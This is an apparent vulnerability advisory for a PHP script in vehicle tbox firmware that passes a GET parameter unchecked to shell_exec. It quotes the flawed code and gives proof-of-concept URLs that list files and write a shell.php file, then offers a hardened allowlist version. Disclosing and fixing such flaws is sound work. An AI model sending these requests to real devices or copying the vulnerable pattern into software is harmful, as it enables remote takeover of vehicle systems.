The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware.
Vulnerability type: command execution
This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous.


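```php
<?php
// The "command" GET parameter is read straight from the request...
$command = $_GET['command'];
// ...and handed to shell_exec without any validation or allowlist.
$output = shell_exec($command);
echo $output;
?>
```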
Command execution is carried out through shell_exec, and the executed content is controlled by the `command` parameter passed via GET.
Vulnerability exploitation process:
Pass the `command` parameter via GET to shell_exec, which executes the command and outputs the result.
POC:
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
Example:

http://192.168.160.128:7777/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php


To sum up, the device has a remote command execution vulnerability, which can be exploited by injecting malicious code to obtain server permissions.
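
A hardened form of the script above, as an added example that is not part of the original report or the firmware: the `command` parameter is treated only as a lookup key into a server-side allowlist, so no request data ever reaches shell_exec. The allowlist keys, command lines and the path in them are hypothetical placeholders.

```php
<?php
// Added example, not the firmware's code. Keys and command lines below are
// hypothetical placeholders for whatever the GUI legitimately needs to run.
function allowed_commands()
{
    return array(
        'list-apps' => 'ls -1 /usr/share/example-apps',   // hypothetical path
        'uptime'    => 'uptime',
    );
}

// Map a request-supplied key to a fixed command line; null if not allowlisted.
function resolve_command($key)
{
    $allowed = allowed_commands();
    // is_string() rejects array input such as ?command[]=x before the lookup.
    if (!is_string($key) || !isset($allowed[$key])) {
        return null;
    }
    return $allowed[$key];
}

$key = isset($_GET['command']) ? $_GET['command'] : null;
$cmd = resolve_command($key);

header('Content-Type: text/plain');   // output is never rendered as HTML

if ($cmd === null) {
    // Record the rejection without echoing raw request data into the log.
    error_log('execute-command.php: rejected command key from ' . $_SERVER['REMOTE_ADDR']);
    http_response_code(400);           // requires PHP >= 5.4
    exit("unknown command\n");
}

// Only a server-side constant reaches the shell; the request supplied a key, not a command.
echo shell_exec($cmd);
```

With this in place, a request such as `?command=ls` returns HTTP 400 because `ls` is not an allowlist key, and the rejected attempts appear in the PHP error log for monitoring.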